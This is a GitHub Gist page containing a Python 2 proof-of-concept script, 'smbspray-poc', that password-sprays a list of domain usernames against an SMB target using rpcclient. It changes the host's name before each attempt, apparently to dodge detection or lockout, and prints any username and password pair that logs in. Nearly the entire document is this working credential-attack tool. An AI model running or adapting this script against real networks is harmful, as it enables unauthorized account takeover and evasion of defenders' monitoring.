Created
February 21, 2019 20:34
-
-
Save prcabral/26092fd92805a8d0a7b50a2e671e2103 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import getopt, sys, subprocess | |
| def help(): | |
| print """ | |
| Usage: smbspray-poc [options]" | |
| \t-l: user list to password spray | |
| \t-c: hostnames to rotate through for each request | |
| \t-p: password | |
| \t-d: domain | |
| \t-t: target server | |
| """ | |
| try: | |
| opts, args = getopt.getopt(sys.argv[1:], "l:c:p:d:t:") | |
| except getopt.GetoptError: | |
| help() | |
| print len(opts) | |
| if len(opts) < 5 or len(opts) > 6: | |
| help() | |
| sys.exit() | |
| for opt, arg in opts: | |
| if opt == "-h": | |
| help() | |
| sys.exit() | |
| elif opt == "-l": | |
| userlist = arg | |
| elif opt == "-c": | |
| clientlist = arg | |
| elif opt == "-p": | |
| password = arg | |
| elif opt == "-d": | |
| domain = arg | |
| elif opt == "-t": | |
| target = arg | |
| #Read username list to spray against | |
| with open(userlist) as f: | |
| usernames = f.readlines() | |
| usernamesstripped = [x.strip() for x in usernames] | |
| #Read hostnames to be used to send to the server. | |
| with open(clientlist) as g: | |
| hostnames = g.readlines() | |
| hostnamesstripped = [x.strip() for x in hostnames] | |
| #Get original hostname to change back to after running | |
| p = subprocess.Popen('hostname', shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) | |
| for line in p.stdout.readlines(): | |
| orighostname = line.strip() | |
| #These are the error messages from rpcclient output to determine success or failure | |
| logonFailed ="NT_STATUS_LOGON_FAILURE" | |
| logonSuccess ="Account Name" | |
| total_accounts = len(usernamesstripped) | |
| print "Total number of users: " + str(total_accounts) | |
| print "Password spraying has now started... please sit tight." | |
| #k = hostname index | |
| k = 0 | |
| #l = maximun index for the hostnames | |
| l = len(hostnamesstripped) - 1 | |
| #Now using rpcclient to spray accounts | |
| for i in range(total_accounts): | |
| subprocess.call("hostnamectl set-hostname '%s'" % hostnamesstripped[k], shell=True) | |
| proc = subprocess.Popen("rpcclient -U \"%s\\%s%s%s\" -c \"getusername;quit\" %s" %(domain, usernamesstripped[i],"%", password, target), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) | |
| output = proc.stdout.read() | |
| if logonSuccess in output: | |
| print "[+] " +usernamesstripped[i] + ":" +password | |
| if k < l: | |
| k +=1 | |
| else: | |
| k = 0 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment